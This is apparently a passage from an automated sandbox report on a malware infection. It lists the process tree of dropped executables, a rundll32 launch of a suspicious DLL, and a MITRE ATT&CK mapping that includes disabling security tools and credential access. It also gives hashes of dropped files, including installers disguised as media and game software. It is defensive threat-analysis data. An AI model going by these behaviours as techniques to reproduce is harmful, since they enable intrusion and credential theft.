                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                    1⤵
                                                                      PID:5696
                                                                    • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:820
                                                                      • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:5144
                                                                    • C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1672
                                                                    • C:\Users\Admin\AppData\Local\Temp\D3C0.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\D3C0.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5132
                                                                      • C:\Users\Admin\AppData\Local\Temp\D3C0.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\D3C0.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:5892
                                                                    • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5852
                                                                      • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:3980
                                                                    • C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:4664
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:6056
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 6056 -s 1240
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:5864
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 6056 -s 2892
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:5992
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 6056 -s 3404
                                                                        2⤵
                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                        • Program crash
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        PID:5352
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:5584
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:1552
                                                                    • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      C:\Users\Admin\AppData\Roaming\agjcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:60
                                                                      • C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        C:\Users\Admin\AppData\Roaming\agjcaev
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        PID:4728
                                                                    • C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      C:\Users\Admin\AppData\Roaming\iejcaev
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      PID:4120
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll",AotYqZ
                                                                      1⤵
                                                                      • Windows security modification
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:1120
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                      1⤵
                                                                        PID:4512
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                        1⤵
                                                                          PID:4884

                                                                        Network

                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                        Execution

                                                                        Scheduled Task

                                                                        1
                                                                        T1053

                                                                        Persistence

                                                                        Registry Run Keys / Startup Folder

                                                                        1
                                                                        T1060

                                                                        Scheduled Task

                                                                        1
                                                                        T1053

                                                                        BITS Jobs

                                                                        1
                                                                        T1197

                                                                        Privilege Escalation

                                                                        Scheduled Task

                                                                        1
                                                                        T1053

                                                                        Defense Evasion

                                                                        Disabling Security Tools

                                                                        2
                                                                        T1089

                                                                        Modify Registry

                                                                        5
                                                                        T1112

                                                                        BITS Jobs

                                                                        1
                                                                        T1197

                                                                        Install Root Certificate

                                                                        1
                                                                        T1130

                                                                        Credential Access

                                                                        Credentials in Files

                                                                        3
                                                                        T1081

                                                                        Discovery

                                                                        Software Discovery

                                                                        1
                                                                        T1518

                                                                        Query Registry

                                                                        5
                                                                        T1012

                                                                        System Information Discovery

                                                                        6
                                                                        T1082

                                                                        Security Software Discovery

                                                                        1
                                                                        T1063

                                                                        Peripheral Device Discovery

                                                                        1
                                                                        T1120

                                                                        Remote System Discovery

                                                                        1
                                                                        T1018

                                                                        Collection

                                                                        Data from Local System

                                                                        3
                                                                        T1005

                                                                        Command and Control

                                                                        Web Service

                                                                        1
                                                                        T1102

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                          MD5

                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                          SHA1

                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                          SHA256

                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                          SHA512

                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                          MD5

                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                          SHA1

                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                          SHA256

                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                          SHA512

                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                        • C:\Program Files\Reference Assemblies\EEUTKFYAHK\ultramediaburner.exe
                                                                          MD5

                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                          SHA1

                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                          SHA256

                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                          SHA512

                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                        • C:\Program Files\Reference Assemblies\EEUTKFYAHK\ultramediaburner.exe
                                                                          MD5

                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                          SHA1

                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                          SHA256

                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                          SHA512

                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                          MD5

                                                                          e71a0a7e48b10bde0a9c54387762f33e

                                                                          SHA1

                                                                          fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                          SHA256

                                                                          83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                          SHA512

                                                                          394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          MD5

                                                                          99431d030eb8a7ed7e9f360f08f597dd

                                                                          SHA1

                                                                          e2e5704a6622f5e476356954848a88cba04ba1aa

                                                                          SHA256

                                                                          ed28dd830241d1369392480310c803f1d3bb2918e080846ec3cb6b5db491b7db

                                                                          SHA512

                                                                          5f071fed52092997495d76c18fd0b406ce07ac9e1f3c43768114e0185ee818e006ab24a084109a762fcd7f9e2132361ccfb85036786d35b72324b647018a7c9f

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          MD5

                                                                          baafc7a4cd67943fde1d4183d82f64ae

                                                                          SHA1

                                                                          aea96afb64b85a807a37e0ce7808ddaf1a752b62

                                                                          SHA256

                                                                          7bafc14572afdcff8c5bb62ad51b4fd09baf9f088075fa8a8c03884bd7d4d85b

                                                                          SHA512

                                                                          358a36f9ec7171a8ed6b5bd3623a521cdf3c82a88c3a50791690c8495685982b8277f69d19519e73178753fe1bfbd52a672e49de1996be9baa8c9df2f002c62a

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          MD5

                                                                          9a4a846193af9b088fb2aa8d1e62ed67

                                                                          SHA1

                                                                          f3e2c42c2604557bc8b13acca4c544a28079389e

                                                                          SHA256

                                                                          a5fe5296a0033539a229280d76dc3a319643eec70e8c2f0241e415512fdba293

                                                                          SHA512

                                                                          2c2a01da486733dd7f597dd6fda700f805e7a5c7c3975d76bbff22cf34d7c84aed807c435dd624758af2c89f53483efbfbef18a0517e3f6b83a4d3f239162c7c

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          MD5

                                                                          686da9fc94e615b5b0a77e3fb36256e8

                                                                          SHA1

                                                                          a11e4026b1ea908f95abb7bee3445bc6dfd9efb4

                                                                          SHA256

                                                                          41d117df712106a0e861b1e36049a4fd1dff8d0afcd864ff7ff691fbceca4a0f

                                                                          SHA512

                                                                          b0d3f7b107042e4c03f410457d26d17ef35a37e44a8308b9c9a91d4b8045bbea52fb5c0883402d86c1833de3f431d11f5260e11db716d984aba4aba6f753a2fb

                                                                        • C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe
                                                                          MD5

                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                          SHA1

                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                          SHA256

                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                          SHA512

                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                        • C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe
                                                                          MD5

                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                          SHA1

                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                          SHA256

                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                          SHA512

                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                        • C:\Users\Admin\AppData\Local\Temp\2k3kvzli.ixq\google-game.exe
                                                                          MD5

                                                                          c8ac728074643959e10336e161341548

                                                                          SHA1

                                                                          8513929be7f80edb797d53a37d470f0509d6c996

                                                                          SHA256

                                                                          35ddc985b3f7f250c011b84df1ff61c89d1c6442cb17a6dc45e1c9ccaecc97c7

                                                                          SHA512

                                                                          434da4bccd0f61fd38b16fc5967caefc21696e1611f723738c005630b260afbc5034e34de6ea3a375d55ab6e0f3c241314a548b3f6df3bd7ea9d7ba31bfba7ac

                                                                        • C:\Users\Admin\AppData\Local\Temp\5aqdb5ah.wgv\instEU.exe
                                                                          MD5

                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                          SHA1

                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                          SHA256

                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                          SHA512

                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                        • C:\Users\Admin\AppData\Local\Temp\5aqdb5ah.wgv\instEU.exe
                                                                          MD5

                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                          SHA1

                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                          SHA256

                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                          SHA512

                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                        • C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Kenessey.txt
                                                                          MD5

                                                                          97384261b8bbf966df16e5ad509922db

                                                                          SHA1

                                                                          2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                          SHA256

                                                                          9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                          SHA512

                                                                          b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                        • C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Rihohotozhae.exe
                                                                          MD5

                                                                          2e916f9f7421b4a03ce59c093c0fe17c

                                                                          SHA1

                                                                          f894b4a08a536da16d43ab83f28de5b90767dba7

                                                                          SHA256

                                                                          31843ccaff2191dadac0b70b2ee4cf249bbe0926aeff0a140611878117f25ff6

                                                                          SHA512

                                                                          b9c810d79a57055cb55aacc1fdeaeeffb54dadeb4a2b72e2f852b70fac58b19f12d70cb1b208ab137790e9ac916caeda5a080f9ee1c47183446eea280525cdd9

                                                                        • C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Rihohotozhae.exe
                                                                          MD5

                                                                          2e916f9f7421b4a03ce59c093c0fe17c

                                                                          SHA1

                                                                          f894b4a08a536da16d43ab83f28de5b90767dba7

                                                                          SHA256

                                                                          31843ccaff2191dadac0b70b2ee4cf249bbe0926aeff0a140611878117f25ff6

                                                                          SHA512

                                                                          b9c810d79a57055cb55aacc1fdeaeeffb54dadeb4a2b72e2f852b70fac58b19f12d70cb1b208ab137790e9ac916caeda5a080f9ee1c47183446eea280525cdd9

                                                                        • C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Rihohotozhae.exe.config
                                                                          MD5

                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                          SHA1

                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                          SHA256

                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                          SHA512

                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                        • C:\Users\Admin\AppData\Local\Temp\L9CvLqDUX8.exe
                                                                          MD5

                                                                          dac476eb95c28c5cc52eabaf262ac97d

                                                                          SHA1

                                                                          b8f879f009decfa380dca47e24ce875f5a805d23

                                                                          SHA256

                                                                          4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                          SHA512

                                                                          276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                        • C:\Users\Admin\AppData\Local\Temp\L9CvLqDUX8.exe
                                                                          MD5

                                                                          dac476eb95c28c5cc52eabaf262ac97d

                                                                          SHA1

                                                                          b8f879f009decfa380dca47e24ce875f5a805d23

                                                                          SHA256

                                                                          4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                          SHA512

                                                                          276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                        • C:\Users\Admin\AppData\Local\Temp\a7-a5011-0db-586a3-38397edd4e7f5\Daelepicosho.exe
                                                                          MD5

                                                                          2304be32b9b1849493336fd90859ba95

                                                                          SHA1

                                                                          6f882e043e752e01d908bedd40ee86119829dab4

                                                                          SHA256

                                                                          75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                          SHA512

                                                                          c76aef6da42442edb1984eda9a10ee7c377f5f5c9684cd02d903868642462165f8e58c1c24ad592f879679416f4335166d36fa3fe52903423bea9f124678ff70

                                                                        • C:\Users\Admin\AppData\Local\Temp\a7-a5011-0db-586a3-38397edd4e7f5\Daelepicosho.exe
                                                                          MD5

                                                                          2304be32b9b1849493336fd90859ba95

                                                                          SHA1

                                                                          6f882e043e752e01d908bedd40ee86119829dab4

                                                                          SHA256

                                                                          75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                          SHA512

                                                                          c76aef6da42442edb1984eda9a10ee7c377f5f5c9684cd02d903868642462165f8e58c1c24ad592f879679416f4335166d36fa3fe52903423bea9f124678ff70

                                                                        • C:\Users\Admin\AppData\Local\Temp\a7-a5011-0db-586a3-38397edd4e7f5\Daelepicosho.exe.config
                                                                          MD5

                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                          SHA1

                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                          SHA256

                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                          SHA512

                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                        • C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                                                                          MD5

                                                                          06a08e813136e0821a988d8d98da796f

                                                                          SHA1

                                                                          b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                          SHA256

                                                                          a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                          SHA512

                                                                          beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                        • C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                                                                          MD5

                                                                          06a08e813136e0821a988d8d98da796f

                                                                          SHA1

                                                                          b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                          SHA256

                                                                          a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                          SHA512

                                                                          beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                        • C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                                                                          MD5

                                                                          06a08e813136e0821a988d8d98da796f

                                                                          SHA1

                                                                          b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                          SHA256

                                                                          a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                          SHA512

                                                                          beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                        • C:\Users\Admin\AppData\Local\Temp\eiini2at.uad\GcleanerWW.exe
                                                                          MD5

                                                                          4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                          SHA1

                                                                          c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                          SHA256

                                                                          6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                          SHA512

                                                                          0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                        • C:\Users\Admin\AppData\Local\Temp\fmfb1v2b.1yt\gpooe.exe
                                                                          MD5

                                                                          64c9830d7c99feffe6deb8e066161a07

                                                                          SHA1

                                                                          23c093d60022a8c6e8e5b7d94481ceafcffec486

                                                                          SHA256

                                                                          bd25adcb3f5024d1718f0604901a2762a22ed8a2da59f4b9a500437b297305fb

                                                                          SHA512

                                                                          ceedddbd96d5b2814407a00a655783e9cfd32daacddf48dc2616b85bbbbb48fe20a06cf0c14b1c6b841d3fd4ae31f860f640a4183c35c5af06aab57f1474b7af

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-63TRH.tmp\ultramediaburner.tmp
                                                                          MD5

                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                          SHA1

                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                          SHA256

                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                          SHA512

                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-63TRH.tmp\ultramediaburner.tmp
                                                                          MD5

                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                          SHA1

                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                          SHA256

                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                          SHA512

                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-71FVL.tmp\Install.tmp
                                                                          MD5

                                                                          45ca138d0bb665df6e4bef2add68c7bf

                                                                          SHA1

                                                                          12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                          SHA256

                                                                          3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                          SHA512

                                                                          cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-95I0P.tmp\Ultra.exe
                                                                          MD5

                                                                          2321171d647af6aee7493ceaa711e6fb

                                                                          SHA1

                                                                          7a4e885025e1afe315e4dc8c74f9666243ac5c2a

                                                                          SHA256

                                                                          4ea355626a1c002680f773dc75af75ea0da8cf50226d0cee058b45385f438da9

                                                                          SHA512

                                                                          bacb1b360911cf798d92481e6bb26724bfb49cf70f199262639d376c39ca3e5d2d31ef1468884812d265f19b91a3e1c987756ab4616e870e5133998dfe2c818b

                                                                        • C:\Users\Admin\AppData\Local\Temp\is-95I0P.tmp\Ultra.exe
                                                                          MD5

                                                                          2321171d647af6aee7493ceaa711e6fb

                                                                          SHA1

                                                                          7a4e885025e1afe315e4dc8c74f9666243ac5c2a

                                                                          SHA256

                                                                          4ea355626a1c002680f773dc75af75ea0da8cf50226d0cee058b45385f438da9

                                                                          SHA512

                                                                          bacb1b360911cf798d92481e6bb26724bfb49cf70f199262639d376c39ca3e5d2d31ef1468884812d265f19b91a3e1c987756ab4616e870e5133998dfe2c818b

                                                                        • C:\Users\Admin\AppData\Local\Temp\ly3rycp4.byw\inst.exe
                                                                          MD5

                                                                          edd1b348e495cb2287e7a86c8070898d

                                                                          SHA1

                                                                          682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                          SHA256

                                                                          eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                          SHA512

                                                                          613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                        • C:\Users\Admin\AppData\Local\Temp\ly3rycp4.byw\inst.exe
                                                                          MD5

                                                                          edd1b348e495cb2287e7a86c8070898d

                                                                          SHA1

                                                                          682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                          SHA256

                                                                          eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                          SHA512

                                                                          613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                        • C:\Users\Admin\AppData\Local\Temp\mj0j3bos.yfa\c7ae36fa.exe
                                                                          MD5

                                                                          bdc3af7526fc621dfec201761352ad6a

                                                                          SHA1

                                                                          3cdbd4a7ee35541a65ace782970870dd710351d5

                                                                          SHA256

                                                                          9d3b59b3b337bbc0cb45cc3ed5090d5184b03910f42851969ad77f927d77199a

                                                                          SHA512

                                                                          a65d031885d6ddb342cf2cf7bdc07e9892c295bf7dd3651e258ec0d88bbbb47af72f9734c0bf6477b82a3f26a6565716f1811bb8f2f265d9b83734e8c064d4b0

                                                                        • C:\Users\Admin\AppData\Local\Temp\mj0j3bos.yfa\c7ae36fa.exe
                                                                          MD5

                                                                          bdc3af7526fc621dfec201761352ad6a

                                                                          SHA1

                                                                          3cdbd4a7ee35541a65ace782970870dd710351d5

                                                                          SHA256

                                                                          9d3b59b3b337bbc0cb45cc3ed5090d5184b03910f42851969ad77f927d77199a

                                                                          SHA512

                                                                          a65d031885d6ddb342cf2cf7bdc07e9892c295bf7dd3651e258ec0d88bbbb47af72f9734c0bf6477b82a3f26a6565716f1811bb8f2f265d9b83734e8c064d4b0

                                                                        • C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1
                                                                          MD5

                                                                          71e5795ca945d491ca5980bbba31c277

                                                                          SHA1

                                                                          c33cd8b3854637bb602f54dfc0fca24d71ca2f82

                                                                          SHA256

                                                                          fd691567c181efe49969737247ae8052278b294d54f5905478f9477d4c76ab2f

                                                                          SHA512

                                                                          f8404c4c609f82f91ad144bc0dd0c7d66e70393f6eab3af55d88969adc141e054c6de117396067ae2bc058e494453d346cd8ed595d7646dfddbb54f8d24f415a

                                                                        • C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1
                                                                          MD5

                                                                          22d6ff2aa8423bbdccf162adcb9e6b2b

                                                                          SHA1

                                                                          528d8a516b181b03c425ab2a76ef3c3437885ae6

                                                                          SHA256

                                                                          f35aeb2952ffdef659754d039c46197a1a7515f4267148698cf10c8a577a8b2e

                                                                          SHA512

                                                                          1fe67ccb9bd3d488ec3a7a1ff676d29d904b5cd675f35c80f7a52b68f7d7f6e9ec20fcbbd04115a8ffa86c3121e10037126f0af28bdbf7b7f8fbcd972765e65b

                                                                        • C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1
                                                                          MD5

                                                                          7e7a7312423953e5486a4012a77b7ae4

                                                                          SHA1

                                                                          ec8ddd4b577c2e5fa9e8bcc47a148c7f491bab53

                                                                          SHA256

                                                                          954a3e3ed9171d8fc1c2a52ca9811733edcacb25cb03545e28ebb0457f0e1c9d

                                                                          SHA512

                                                                          209582d33265cce3318ae6da5ed38ece94219551ac57166752cdce12c4c35ac834a607a879fa6d215c1440350455a27e27d5ee6bfc2ffd33081e3b3cdb324257

                                                                        • C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1
                                                                          MD5

                                                                          8fdce8a3774e1f7ed61d8299adee3edd

                                                                          SHA1

